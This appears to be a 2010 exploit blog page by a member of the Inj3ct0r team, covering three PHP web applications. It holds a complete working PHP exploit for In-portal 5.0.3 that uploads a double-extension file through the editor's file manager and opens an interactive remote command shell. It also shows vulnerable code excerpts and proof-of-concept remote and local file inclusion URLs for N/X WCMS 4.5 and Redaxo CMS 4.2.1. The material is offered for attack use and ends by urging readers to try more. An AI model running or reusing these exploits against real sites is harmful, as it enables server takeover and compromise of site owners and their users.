2010/04/23

In-portal 5.0.3 Remote Arbitrary File Upload Exploit

/*
-----------------------------------------------------------------
In-portal 5.0.3 Remote Arbitrary File Upload Exploit
-----------------------------------------------------------------

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ######################################## 1
0 I'm eidelweiss member from Inj3ct0r Team 1
1 ######################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

Developers: http://www.in-portal.org/
Download : http://www.in-portal.com/download.html
exploited by ..: eidelweiss
Special thanks to all my friends who helped and support me when i sick
details..: works with an Apache server with the mod_mime module installed (if specific)

[-] vulnerable code in path/core/editor/editor/filemanager/connectors/php/config.php

[*] // SECURITY: You must explicitly enable this "connector". (Set it to "true").
[*]
[*] $Config['Enabled'] = true ;
[*]
[*] // Path to user files relative to the document root.
[*] $Config['UserFilesPath'] = BASE_PATH . WRITEBALE_BASE . '/user_files/';
[*]
[*] // Fill the following value it you prefer to specify the absolute path for the
[*] // user files directory. Usefull if you are using a virtual directory, symbolic
[*] // link or alias. Examples: 'C:\\MySite\\UserFiles\\' or '/root/mysite/UserFiles/'.
[*] // Attention: The above 'UserFilesPath' must point to the same directory.
[*]
[*]
[*] $Config['AllowedExtensions']['File'] = array('7z', 'aiff', 'asf', 'avi', 'bmp', 'csv', 'doc', 'fla', 'flv', 'gif', 'gz', [....]
[*] $Config['DeniedExtensions']['File'] = array() ;
[*]
[*] $Config['AllowedExtensions']['Image'] = array('bmp','gif','jpeg','jpg','png') ;
[*] $Config['DeniedExtensions']['Image'] = array() ;
[*]
[*] $Config['AllowedExtensions']['Flash'] = array('swf','flv') ;
[*] $Config['DeniedExtensions']['Flash'] = array() ;
[*]
[*] $Config['AllowedExtensions']['Media'] = array('aiff', 'asf', 'avi', 'bmp', 'fla', 'flv', 'gif', 'jpeg', 'jpg', 'mid', 'mov', 'mp3', 'mp4', 'mpc', 'mpeg', 'mpg', 'png', 'qt', 'ram', 'rm', 'rmi', 'rmvb', 'swf', 'tif', 'tiff', 'wav', 'wma', 'wmv') ;
[*] $Config['DeniedExtensions']['Media'] = array() ;

with a default configuration of this script, an attacker might be able to upload arbitrary
files containing malicious PHP code due to multiple file extensions isn't properly checked
*/

*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
function upload()
{
global $host, $path;

$connector = "/core/editor/editor/filemanager/connectors/php/config.php";
$file_ext = array("zip", "jpg", "fla", "doc", "xls", "rtf", "csv");

foreach ($file_ext as $ext)
{
print "\n[-] Trying to upload with .{$ext} extension...";

$data = "--abcdef\r\n";
$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"0k.php.{$ext}\"\r\n";
$data .= "Content-Type: application/octet-stream\r\n\r\n";
$data .= "\r\n";
$data .= "--abcdef--\r\n";

$packet = "POST {$path}{$connector}?Command=FileUpload&CurrentFolder={$path} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=abcdef\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $data;

preg_match("/OnUploadCompleted\((.*),'(.*)'\)/i", http_send($host, $packet), $html);

if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]}: {$html[2]})\n");

$packet = "GET {$path}0k.php.{$ext} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
$html = http_send($host, $packet);

if (!eregi("print", $html) and eregi("_code_", $html)) return $ext;

sleep(1);
}

return false;
}
print "\n+--------------------------------------------------------------------+";
print "\n| In-portal 5.0.3 Remote Arbitrary File Upload Exploit by eidelweiss |";
print "\n+--------------------------------------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage......: php $argv[0] host path\n";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /In-portal/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
if (!($ext = upload())) die("\n\n[-] Exploit failed...\n");
else print "\n[-] Shell uploaded...starting it!\n";
define(STDIN, fopen("php://stdin", "r"));
while(1)
{
print "\portal-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$packet = "GET {$path}0k.php.{$ext} HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
$packet.= "Connection: close\r\n\r\n";
$html = http_send($host, $packet);
if (!eregi("_code_", $html)) die("\n[-] Exploit failed...\n");
$shell = explode("_code_", $html);
print "\n{$shell[1]}";
}
else break;
}
?>

2010/04/19

N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability




====================================================
N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability
====================================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ######################################## 1
0 I'm eidelweiss member from Inj3ct0r Team 1
1 ######################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

Work If: magic_quotes_gpc & magic_quotes_runtime Disable
Download: http://sourceforge.net/projects/nxwcms/files/0.%20N_X%20WCMS%204.5%20System/4.5%20Release%201/nx45.zip/download

Author: eidelweiss
Contact: eidelweiss[at]cyberservices.com
Thank`s: r0073r & 0x1D (inj3ct0r) , JosS , exploit-db team , [D]eal [C]yber
sp3x (securityreason) get-well brother
Special To: m4rc0 & LeQhi (thank`s so much brother , respect to you)

Advisories: http://eidelweiss-advisories.blogspot.com/2010/04/nx-web-cms-nx-wcms-45-multiple.html

========================================================================

Description:

N/X 4.0 is a powerful content management system for the web.
N/X CMS is focused on delivering content in many powerful ways.
Its functions and content-types can be extended with the plugin-interface and a very very powerful API.

========================================================================

-=[ VULN C0de ]=-

**************************************************
[-] nx_path/www/text.php
**************************************************

require_once "nxheader.inc.php";
include $cds->path."inc/header.php";

// Start of individual template
echo $cds->content->get("Headline");
br();
echo $cds->content->get("Body");


include $cds->path."inc/footer.php";
require_once "nxfooter.inc.php";
?>

**************************************************
[-] nx_path/www/article.php
**************************************************

require_once "nxheader.inc.php";
require_once $cds->path."inc/header.php";

// get the id of the article from the request
// do type validation

echo $cds->cluster->draw($article);
br();
br();

// link back to the page where the article was called
echo $cds->content->get("Backlink Title");

require_once $cds->path."inc/footer.php";
require_once "nxfooter.inc.php";
?>

**************************************************
[-] nx_path/www/article_overview.php
**************************************************
require_once "nxheader.inc.php";
require_once $cds->path."inc/header.php"; // line 3

*****

require_once $cds->path."inc/footer.php"; // line 42
require_once "nxfooter.inc.php";
?>

**************************************************
[-] nx_path/www/sitemap.php
**************************************************

require_once "nxheader.inc.php";
include $cds->path."inc/header.php"; // line 3

*****

include $cds->path."inc/footer.php"; // line 56
require_once "nxfooter.inc.php";
?>

**************************************************
[-] nx_path/www/pagelayout.inc.php
**************************************************

**************************************************
[-] nx_path/www/nxheader.inc.php
**************************************************

/*
* Include this file in your page-templates
*/
if (isset($c["path"])) {
require_once $c["path"]."config.inc.php";
} else {
require_once "../cms/config.inc.php";
}
include_once $c["path"]."api/cds/track_exit_pages.php";
require_once $c["path"]."api/cds/lib.inc.php";

*****

if ($c["pagetracking"] && ! $c["usewebbug"]) {
include_once $c["path"].'modules/stats/phpOpenTracker.php'; // line 31
@phpOpenTracker::log(array('document' => $page));
}
require_once $c["path"]."ext/jpcache/jpcache.php"; // line 34

**************************************************
[-] nx_path/cms/api/xml/lib.inc.php
**************************************************
require_once $c["path"] . "api/xml/xpath.class.php";
require_once $c["path"] . "api/xml/meta.php";
require_once $c["path"] . "api/xml/plugin.php";
require_once $c["path"] . "api/xml/cluster_template.php";
require_once $c["path"] . "api/xml/cluster.php";
require_once $c["path"] . "api/xml/sitepage_master.php";
require_once $c["path"] . "api/xml/syndication.php";
require_once $c["path"] . "api/xml/xmlapi_prepare.php";
?>

**************************************************
[-] nx_path/cms/api/parser/lib.inc.php
**************************************************
require_once $c["path"] . "api/parser/nxparser.php";
require_once $c["path"] . "api/parser/class.filemanipulation.php";
require_once $c["path"] . "api/parser/class.mso2003.php";
require_once $c["path"] . "api/parser/class.openoffice.php";
require_once $c["path"] . "api/parser/nx2html.php";
require_once $c["path"] . "api/parser/html2nx.php";
require_once $c["path"] . "api/parser/launch_text.php";
require_once $c["path"] . "api/parser/importhtml.php";
require_once $c["path"] . "api/parser/importtext.php";
?>

**************************************************
[-] nx_path/cms/api/cms/lib.inc.php
**************************************************
require_once $c["path"] . "api/cms/cache.php";
require_once $c["path"] . "api/cms/journal.php";
require_once $c["path"] . "api/cms/launch.php";
require_once $c["path"] . "api/cms/mass_operations.php";
require_once $c["path"] . "api/cms/oiddictionary.php";
require_once $c["path"] . "api/cms/paths.php";
require_once $c["path"] . "api/cms/plugin.php";
require_once $c["path"] . "api/cms/image.php";
require_once $c["path"] . "api/cms/sitepages.php";
require_once $c["path"] . "api/cms/sitepage_master.php";
require_once $c["path"] . "api/cms/synchronize.php";
require_once $c["path"] . "api/cms/cdsinformation.php";
require_once $c["path"] . "api/cms/acl/lib.inc.php";
require_once $c["path"] . "api/cms/log.php";
require_once $c["path"] . "api/cms/meta.php";
require_once $c["path"] . "api/cms/cluster_template.php";
require_once $c["path"] . "api/cms/cluster.php";
require_once $c["path"] . "api/cms/channel.php";
require_once $c["path"] . "api/cms/design.class.php";
require_once $c["path"] . "api/cms/designclasses.php"
?>
========================================================================

-=[ P0C RFI ]=-

http://127.0.0.1/[NX_PATH]/www/text.php?path= [inj3ct0r sh3ll]
http://127.0.0.1/[NX_PATH]/www/article.php?path= [inj3ct0r sh3ll]
http://127.0.0.1/[NX_PATH]/www/article_overview.php?path= [inj3ct0r sh3ll]
http://127.0.0.1/[NX_PATH]/www/sitemap.php?path= [inj3ct0r sh3ll]
http://127.0.0.1/[NX_PATH]/www/pagelayout.inc.php?c[path]= [inj3ct0r sh3ll]
http://127.0.0.1/[NX_PATH]/www/nxheader.inc.php?c[path]= [inj3ct0r sh3ll]
http://127.0.0.1/[NX_PATH]/cms/api/xml/lib.inc.php?c[path]= [inj3ct0r sh3ll]
http://127.0.0.1/[NX_PATH]/cms/api/parser/lib.inc.php?c[path]= [inj3ct0r sh3ll]
http://127.0.0.1/[NX_PATH]/cms/api/cms/lib.inc.php?c[path]= [inj3ct0r sh3ll]

etc , etc ,etc


-=[ P0C LFI ]=-

http://127.0.0.1/[NX_PATH]/www/nxheader.inc.php?page= [LFI]

etc , etc , etc,

[*] So many vulnerability here , use your skill and play your imagination [*]
[*] vuln in NX_path/wwwdev Directory i thing same with vuln in NX_path/www that`s why i don`t put here [*]

=========================| -=[ E0F ]=- |=================================

2010/04/18

Redaxo CMS 4.2.1 Remote File Inclusion Vulnerability




========================================================================
Redaxo CMS 4.2.1 Remote File Inclusion Vulnerability
========================================================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ######################################## 1
0 I'm eidelweiss member from Inj3ct0r Team 1
1 ######################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

Vendor: www.redaxo.de
Download: http://www.redaxo.de/files/redaxo4_2_1.zip

Author: eidelweiss
Contact: eidelweiss[at]cyberservices.com
Thank`s: r0073r & 0x1D (inj3ct0r) , JosS , exploit-db team , [D]eal [C]yber
sp3x (securityreason) get-well brother

========================================================================

Description:

So soll ein Content-Management-System sein. REDAXO vereint hohe Flexibilität mit einfacher Handhabung für sinnvolle Nutzung.
Es eignet sich sowohl für kleinere Auftritte als auch für große und komplexe Internetportale.
Dank des modularen Aufbaus und der vielen Erweiterungsmöglichkeiten deckt REDAXO alle erforderlichen Funktionalitäten eines umfassenden Redaktionssystems ab.
Zusätzlich ist REDAXO ein Open-Source-System und somit kostenlos und kommerziell frei verwendbar.

========================================================================

-=[ VULN C0de ]=-

**************************************************
[-] redaxo/include/pages/specials.inc.php
**************************************************

// -------------- Defaults

$subpage = rex_request('subpage', 'string');
$func = rex_request('func', 'string');

// -------------- Header

$subline = array(
array( '', $I18N->msg('main_preferences')),
array( 'lang', $I18N->msg('languages')),
);

rex_title($I18N->msg('specials'),$subline);

switch($subpage)
{
case 'lang': $file = 'specials.clangs.inc.php'; break;
default : $file = 'specials.settings.inc.php'; break;
}

require $REX['INCLUDE_PATH'].'/pages/'.$file;

**************************************************
[-] redaxo/include/addons/version/pages/index.inc.php
**************************************************

require $REX['INCLUDE_PATH'].'/layout/top.php';

rex_title('Version AddOn');

?>

msg('code_for_module_input'); ?>




msg('module_intro_help'); ?>


msg('module_rights'); ?>






require $REX['INCLUDE_PATH'].'/layout/bottom.php';

========================================================================

-=[ P0C ]=-

http://127.0.0.1/redaxo_path/include/addons/version/pages/index.inc.php?REX[INCLUDE_PATH]=[inj3ct0r sh3ll]

http://127.0.0.1/redaxo_path/include/pages/specials.inc.php?subpage=lang&REX[INCLUDE_PATH]=[inj3ct0r sh3ll]


=========================| -=[ E0F ]=- |=================================